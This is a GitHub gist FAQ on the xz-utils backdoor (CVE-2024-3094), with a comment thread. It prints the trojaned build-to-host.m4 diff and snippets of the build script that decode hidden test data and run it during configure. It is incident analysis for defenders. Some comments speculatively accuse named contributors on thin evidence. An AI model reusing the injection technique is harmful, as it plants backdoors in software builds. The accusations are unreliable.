Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active January 2, 2025 15:08
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@F1nny
Copy link

F1nny commented Mar 30, 2024

Great writeup, props and good idea! @github handling of the repo is unfortunate and hopefully rolled back soon, let's see what can find out 🤞

@ITJamie
Copy link

ITJamie commented Mar 30, 2024

One of the outcomes id like to see is systemd move away from xz completely and move to zstd or similar. xz was barely maintained pre 2022.

@Apsu
Copy link

Apsu commented Mar 30, 2024

https://github.com/xz-mirror/xz interesting find. https://github.com/xz-mirror/xz/commits?author=JiaT75 is all over it, but at least the repo is viewable -- appears 7 months old.

https://git.tukaani.org/?p=xz.git;a=summary this is much more interesting though. Might be a viable candidate to clean from.

@Ninpo
Copy link

Ninpo commented Mar 30, 2024

Does anyone know if Ubuntu 22.04 Server is affected, or what command I could run to know if I am affected? I'm not familiar with detecting installed library versions.

It's not affected, but to check you can dpkg -l | grep xz-utils to see the installed version. For rpm based distros, rpm -q xz or rpm -q xz-libs

@Benj2005
Copy link

Great writeup, props and good idea! @github handling of the repo is unfortunate and hopefully rolled back soon, let's see what can find out 🤞

There seems to be a working mirror at https://git.tukaani.org/xz.git.
I found this from another PR made by the malicious committer - https://github.com/google/oss-fuzz/pull/11286.

@waterkip
Copy link

It's not affected, but to check you can dpkg -l | grep xz-utils

apt-cache policy xz-util is easier I think.

github's closure of the repo is insane, it prevents the world from inspecting the source code.

@nomad-geek
Copy link

github's closure of the repo is insane, it prevents the world from inspecting the source code.

seriously dumb.

@StefanCristian
Copy link

It's not affected, but to check you can dpkg -l | grep xz-utils

apt-cache policy xz-util is easier I think.

github's closure of the repo is insane, it prevents the world from inspecting the source code.

You can still inspect the code on git.tukaani.org, some linux distributions still have automation pointed to that.

But the main problem is that Github doesn't have a procedure for:

  • Leaving discussions, reporting & possible patch proposals open
  • Forbidding code & tag fetch on a repo

In such situations it's imperative to leave the discussions & reporting open, while blocking code fetch. Not nuking everything.

What Github did is just terrible.

@AN4364364
Copy link

AN4364364 commented Mar 30, 2024

@thesamesam, thank you very much for this document.

I have an odd observation, and I haven't been able to find an explanation so I'm going to ask it here. I noticed the JiaT75 Github account was following only 3 accounts. 2 were related to their project, but the third was yours, thesamesam. Why? Was it anything like the comment made by this Hacker News user, saying JiaT75 tried to persuade them to add the malicious code to Fedora? If your situation is similar, can you share what JiaT75 asked you to do?

https://news.ycombinator.com/item?id=39865810#39866275

To be super clear to everyone reading this, I am not leveling any accusations and I am grateful that thesamesam has provided so much to those of us trying to catch up.

@StefanCristian
Copy link

StefanCristian commented Mar 30, 2024

@thesamesam, thank you very much for this document.

I have an odd observation, and I haven't been able to find an explanation so I'm going to ask it here. I noticed the JiaT75 Github account was following only 3 accounts. 2 were related to their project, but the third was yours, thesamesam. Why? Was it anything like the comment made by this Hacker News user, saying JiaT75 tried to persuade them to add the malicious code to Fedora? If your situation is similar, can you share what JiaT75 asked you to do?

https://news.ycombinator.com/item?id=39865810#39866275

To be super clear to everyone reading this, I am not leveling any accusations and I am grateful that thesamesam has provided so much to those of us trying to catch up.

Probably after this: https://bugs.gentoo.org/925415

In commit 72d2933bfae514e0dbb123488e9f1eb7cf64175f on xz.git main repo, Jia thanked Sam on 05.03.2024 for the bug report.
"Author: Jia Tan [email protected]
Date: Tue Mar 5 00:34:46 2024 +0800

liblzma: Use attribute no_profile_instrument_function with ifunc.

Thanks to Sam James for determining this was the attribute needed to
workaround the GCC bug and for his version of the patch in Gentoo."

Sam is a Gentoo developer and maintainer. You can read the bug in question from the link above.
Edit: more like Sam asked Jia to fix the issues upstream, so that Gentoo can compile the package. Not the other way around.

@waterkip
Copy link

You can still inspect the code on git.tukaani.org, some linux distributions still have automation pointed to that.

I know, but you cannot see the past, closed, or open PRs.

@jab4
Copy link

jab4 commented Mar 30, 2024

Thanks everybody for spending their time on this and the folks at Debian for providing timely updates!

Speculation: Maybe Jia was trying a Proof of Concept after getting inspired by Alex Rider Season 2 in an attempt to roll the biggest distributed supercomputer on Earth — without creating a costly game studio empire as front, but instead by hijacking the FOSS community for free.

@gamer191
Copy link

This commit/PR seems suspicious as well: https://github.com/google/oss-fuzz/pull/10667/files.

And it was made when 5.4.4 was the latest version of xz

Do you think that versions prior to 5.6.0 might have contained a different backdoor?
Related: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024

@herabit
Copy link

herabit commented Mar 30, 2024

Really regretting taking my sleeptime meds right when I learned this occurred. A night of potential reverse engineering ruined! Keep up with the updates, they're greatly appreciated. It is bewildering to me that this kind of thing is even possible, not surprising, however nonetheless immensely bewildering.

@Krutonium
Copy link

Really regretting taking my sleeptime meds right when I learned this occurred. A night of potential reverse engineering ruined! Keep up with the updates, they're greatly appreciated. It is bewildering to me that this kind of thing is even possible, not surprising, however nonetheless immensely bewildering.

Counter Point; Coffee

@mary-ext
Copy link

mary-ext commented Mar 30, 2024

The fuck it isn't. This is why you don't allow overly complex bloatware (aka literally anything ever written by or involving Poettering) to reach its tendrils into every bit of your system. Complexity is the enemy of security.

Debian and other distributions patched in support for systemd-notify by relying on libsystemd, but realistically it didn't need to pull in libsystemd for said functionality.

As said in above comments, it also didn't need to be libsystemd specifically. liblzma is being pulled in by libselinux.

So it seems rather unproductive to put systemd at stake here, given that the backdoor would've happened anyway without the presence of systemd.

Copy link

ghost commented Mar 30, 2024

@cloudhan
Copy link

github's closure of the repo is insane, it prevents the world from inspecting the source code.

They are maybe just covering their ass for now, in case about lawsuit in "helping/involving with the attack"

@oven8Mitts
Copy link

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024

Unofficial discussions on Debian downgrading to 5.3.1

I count a minimum of 750 commits or contributions to xz by Jia Tan, who
backdoored it.

This includes all 700 commits made after they merged a pull request in Jan 7
2023, at which point they appear to have already had direct push access, which
would have also let them push commits with forged authors. Probably a number of
other commits before that point as well.

Reverting the backdoored version to a previous version is not sufficient to
know that Jia Tan has not hidden other backdoors in it. Version 5.4.5 still
contains the majority of those commits.

Commits by them such as 18d7facd3802b55c287581405c4d49c98708c136
and ae5c07b22a6b3766b84f409f1b6b5c100469068a show that they were deep
into analyzing the security of xz. They were well placed to insert a buffer
overflow that could allow eg, a targeted xz file to cause arbitrary code
execution. The impact of such a security hole could be much more stealthy and
bad than the known backdoor since it would allow chaining xz with other
unrelated software releases on an ongoing basis.

...

I'd suggest reverting to 5.3.1. Bearing in mind that there were security
fixes after that point for ZDI-CAN-16587 that would need to be reapplied.

@nhatzHK
Copy link

nhatzHK commented Mar 30, 2024

Lasse Collin mentions Jia Tan in the commit logs for the first time in February 2022 and then semi-regularly afterwards.

liblzma: Minor addition to lzma_vli_size() API doc.
Thanks to Jia Tan.

In April 2022, a CVE for arbitrary file-writes affecting xzutils was found and reported.

All previous versions of gzip and xzutils are affected.

At that point Jia Tan had been thanked a couple times in the logs, including once for a patch but the commit was from Lasse Collin (probably squashed).

liblzma: Threaded decoder: Don't stop threads on LZMA_TIMED_OUT.
LZMA_TIMED_OUT is not an error and thus stopping threads on
LZMA_TIMED_OUT breaks the decoder badly.
Thanks to Jia Tan for finding the bug and for the patch.

It's possible nothing malicious happened yet at that point. Lasse Collin said the bug originated in gzip

This bug was inherited from gzip's zgrep. gzip 1.12 includes
a fix for zgrep.

In May 2022, Lasse Collin mentions that Jia Tan has been helping off-list with xz-utils

Jia Tan has helped me off-list with XZ Utils and he might have a bigger
role in the future at least with XZ Utils. It's clear that my resources
are too limited (thus the many emails waiting for replies) so something
has to change in the long term.

Jia Tan's first commit comes in on June 10 2022. (part of the diff)

+/// Since the output values of these functions are hardware dependent, these
+/// tests are trivial. They are simply used to detect errors and machines
+/// that these function are not supported on.

Only 19 days later, in June 2022, Lasse Collin mentions that Jia Tan could even be considered a co-maintainer at that point.

As I have hinted in earlier emails, Jia Tan may have a bigger role in
the project in the future. He has been helping a lot off-list and is
practically a co-maintainer already. :-) I know that not much has
happened in the git repository yet but things happen in small steps. In
any case some change in maintainership is already in progress at least
for XZ Utils.

Presumably Jia Tan has been helping a lot off-list before being added as a maintainer or gaining write acces to the main branch. The latest completely untouched version is before 5.2. More traces of Jia Tan's involvement can be found once Microsoft (stops being typically Microsoft and) brings the repo back on here. If anyone needed more reasons to avoid github... But in any case just looking at the commits' author is not gonna be enough!

@gamer191
Copy link

This 7 month old mirror looks legit: https://github.com/xz-mirror/xz

Important to note that, if I'm reading https://github.com/xz-mirror/xz/commits?author=JiaT75&after=74c3449d8b816a724b12ebce7417e00fb597309a+244 correctly, JiaT75 gained commit access in December 2022

On 22 June 2022 an account incorrectly assumed that Jia had commit access. I suspect that that was an alternate persona created by Jia, as a way of pressuring Lasse Collin into giving him commit access

@ZeroAurora
Copy link

good writeup thanks. sharing this to my friends.
this is literally the most wtf moment in recent years for me

@xen0n
Copy link

xen0n commented Mar 30, 2024

What about this Open PR tukaani-project/xz#86 with several force-push from 27 days ago?

I see JiaT75 account working with another user account (xry111) on further CRC changes (crc changes that are currently exploited), and that user has also contributed to many core linux subsystems like openssl and systemd, protobuf-c. llvms, util-linux. torvalds/linux, make-ca, cpython... xry111 has submitted PRs and commits and alo reviewer of PRs in many places. 16 repo contributed to this year, 47 repos in 2023, 38 in 2024.

He seems to be participating to Loongsong Chinese architecture and Linux From Scratch, though, which might explain his wide contributions, but SSL, CRC, Make, Building, Kernel, curl, libxcrypt... , that's a lot of places where he is contributing code or reviewing code. Wouldn't that allow for very sophisticated similar exploits ?

I did not review all but I see some make-ca update to silence openssl warnings...

Wow it's crazy how many different core areas of Linux code is beeing changed to cope with Loongsong LoongArch.

From a quick glance, Rust, LLVM are modified by coordination of xry111 and also xen0n. That xen0n has like contributed to 101 different repos last year. It seems he is also working on Loongsong architecture.

Ah, waking up only to see this xz drama, and with myself somehow "involved"... I've just checked my boxes and they aren't affected, so let me provide some info from my perspective.

For the record, I know this xry111 guy and have met him in person last year, so I can at least confirm his identity is real and that he is actually doing the porting work. Either I'm being deceived as well, or maybe it's just unfortunate similarity in activity patterns after all; one can only know by actually reviewing the code.

As for the potential link to Loongson/LoongArch, I deliberately avoid getting into affiliation with Loongson, and haven't signed any NDA with them. AFAIK xry111 is also unaffiliated. We're mostly just doing trivial arch enablement here and there, fixing build errors, fixing modern C compatibility, all the daily packager stuff, and only occasionally going deeper than that. And from my experience, most of the arch-specific, or LoongArch-specific changes, would be guarded by #ifdef's or reside in separate files, and would never get built on other more popular arches.

Hope that's helpful in clearing some of the confusion or suspicion; I know I'm one of the people being suspected here though, so if that's the case, maybe read the code and reach your own conclusion. (And I'm not being defensive by replying with this; don't take this to be personal if I sound strange by not being a native speaker of English.)

@Artoria2e5
Copy link

Artoria2e5 commented Mar 30, 2024

And if you are trying to build a Debian or Red Hat package:

I would recommend rewording this to "building a package with dpkg or rpm". It's plausible to write and use rpm spec files without depending on the rest of the (whatever rpm distro you're using)'s package tree. It's less plausible to do the same with dpkg-buildpackage because it's a bigger bother to write debian/*, but is still possible.


@aspu https://git.tukaani.org/?p=xz.git;a=summary this is much more interesting though. Might be a viable candidate to clean from.

This is probably up-to-date with GitHub's version of the git tree. It does not have the fun stuff in the releases, but it does have the two test files.

The wayback machine at https://web.archive.org/web/20240226100419/https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.gz (for full list, see here) gives sha512 1ef3cd3607818314e55b28c20263a9088d4b6e5362a45fbd37c17e799e26b4a7579928b99925ffe71e7804b0db2f65936f66a825bac9b23b7b0664f902925de8. This is consistent with https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5005868#gistcomment-5005868, but somehow not with https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5005854#gistcomment-5005854.

I think someone should more carefully document where the script comes from and how to extract it. I am a bit lost in Sam's comments as to which is which, since he presented two different SHA512s for the same filename.

(I saw a tweet with part of the extraction run manually. Involves a lot of head. Yeah... the pros are probably already on the ELF file, why should I worry now.)

@herzeleid02
Copy link

are there news considering the exploitation of this backdoor?

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

Guys, I know we can't read PRs anymore in xz repo, but as I said earlier this PR tukaani-project/xz#86 was about actor JiaT75 coordinating with actor xry111 to further like "completely fasten CRC manytimesfold".

Maybe the code in that particular PR is legit, BUT:

As per original Andres Freund discovery, this exploit is exploiting CRC routines. Also same xry111 previously contributed (approved other's PRs and reviewed PRs from others) from openssl (SSH is involved the backdoor)

That actor is involved in so many PR/commits/review in openssl and systemd, protobuf-c. llvms, util-linux. torvalds/linux, make-ca, cpython, curl, libxcrypt, dosbox-x, rust...
16 repo contributed to this year, 47 repos in 2023, 38 in 2024.
Some of his PRs are reviewed in conjunction with xen0n or xry111 is reviewing PRs from him. xen0n has contributed 36 repos this year, 101 in 2023 and 136 in 2024.

They are participating to adding support for "Loongsong Chinese architecture", so that might explain their wide contributions, but everyone in their group https://github.com/loongson-community is accessing a large number of key open source projects
Overall they cover such a wide number of open source projects, rust, nodejs, mozilla repos...

I'm not saying all PRs are suspicious, but certainly an actor can coordinate between these components to push a few changes here an there to create some sophisticated exploit like the one showed here to exploit .

It's a Loong stretch, but Linux is like powering $400-500B Cloud/Saas revenue, not counting all standalone servers out there, All of that powering a large portion of the world's economy; so a motivated bad actor can definetaly afford taking a couple of years of good contributions to obfuscate and backdoor Linux.

The sophistication of the current attack is an indicator all of packages these folks contributed need complete review of all PRs and commits from these folks.

thanks @ozars for this link:
https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPTSBnaXRodWJfZXZlbnRzIFdIRVJFIGFjdG9yX2xvZ2luPSd4cnkxMTEnIE9SREVSIEJZIGZpbGVfdGltZSBERVND

Using SELECT DISTINCT repo_name FROM github_events WHERE actor_login='xry111' ORDER BY file_time DESC

In the above will help assess how many linux core code are impacted by this actor/group (a lot).
image

Please comment on this, am I hallucinating ? This is a serious concern.
All original official projects these group touched need complete review of that group's contribution to their code, if you know them, please get their feedback on the topic

Coordinated changes to kernel, build tools, core deamons library and drivers is definitely possible after gaining trust over legit contributions by many different accounts over the course of many years for a motivated threat actor.

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

Ah, waking up only to see this xz drama, and with myself somehow "involved"... I've just checked my boxes and they aren't affected, so let me provide some info from my perspective.

For the record, I know this xry111 guy and have met him in person last year, so I can at least confirm his identity is real and that he is actually doing the porting work. Either I'm being deceived as well, or maybe it's just unfortunate similarity in activity patterns after all; one can only know by actually reviewing the code.

As for the potential link to Loongson/LoongArch, I deliberately avoid getting into affiliation with Loongson, and haven't signed any NDA with them. AFAIK xry111 is also unaffiliated. We're mostly just doing trivial arch enablement here and there, fixing build errors, fixing modern C compatibility, all the daily packager stuff, and only occasionally going deeper than that. And from my experience, most of the arch-specific, or LoongArch-specific changes, would be guarded by #ifdef's or reside in separate files, and would never get built on other more popular arches.

Hope that's helpful in clearing some of the confusion or suspicion; I know I'm one of the people being suspected here though, so if that's the case, maybe read the code and reach your own conclusion. (And I'm not being defensive by replying with this; don't take this to be personal if I sound strange by not being a native speaker of English.)

Thanks for replying, I'm sorry if I'm overstretching this and you are innocent. My second post arrived in the mean time. We need all original project maintainers to review all your group's contributions as some legit contributions might have been used to obfuscate other backdoor-allowing code in systemd, llvm, make, openssl...

I was already suspicious seeing none of your group are actual official employees of Loongson.

@Artoria2e5
Copy link

Artoria2e5 commented Mar 30, 2024

I simply love it when people start connecting weird-ahh lines.

Look Mr Z-nonymous, I've met with at least 3 of the people on your screenshot, maybe even more but I'm terrible with faces. Felix Yan even signed my lost PGP key 222d7bda before a LUG meet many years ago. You're accusing people with real identification cards and faces and online names from the shadow of anonymity.

You better not bother my fat cat-avatar friend.

I was already suspicious seeing none of your group are actual official employees of Loongson.

If you know, you know. The Loongson people are terrible at writing documentation for the fancy features they bloat about (or according to their insiders, terrible at getting their legal or whatever departments to approve the public release of documentation; "you can win a competition and sign an NDA to get it!"). Their hardware is new, curious, and not cheap. Some people buy one and just spend forever trying to make it run a GBA emulator faster. It's basically Alcoholics Anonymous, but for people who spend 500+ dollars on a weird computer.

@Z-nonymous
Copy link

I simply love it when people start connecting weird-ahh lines.

Look Mr Z-nonymous, I've met with at least 3 of the people on your screenshot, maybe even more but I'm terrible with faces. Felix Yan even signed my lost PGP key 222d7bda before a LUG meet many years ago. You're accusing people with real identification cards and faces and online names from the shadow of anonymity.

You better not bother my fat cat-avatar friend.

I was already suspicious seeing none of your group are actual official employees of Loongson.

If you know, you know. The Loongson people are terrible at writing documentation for the fancy features they bloat about (or according to their insiders, terrible at getting their legal or whatever departments to approve the public release of documentation; "you can win a competition and sign an NDA to get it!"). Their hardware is new, curious, and not cheap. Some people buy one and just spend forever trying to make it run a GBA emulator faster. It's basically Alcoholics Anonymous, but for people who spend 500+ dollars on a weird computer.

Again sorry if i'm over stretching, I'd love to be wrong.

Again CRC, systemd, SSL cordinated changes that are exploited by this backdoor payload. hundreds of billions of potential ransomware $
I'm not buying anything other than the original code maintainers, of the touched repos to validated all that group's contribution.

I'm not disclosing my indentity because it's not needed to participate in github, which is why such elaborate attack is possible.

@lhmouse
Copy link

lhmouse commented Mar 30, 2024

Yeah, China! China! When something involves a random Chinese, it always unfolds with accusation out of thin air.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment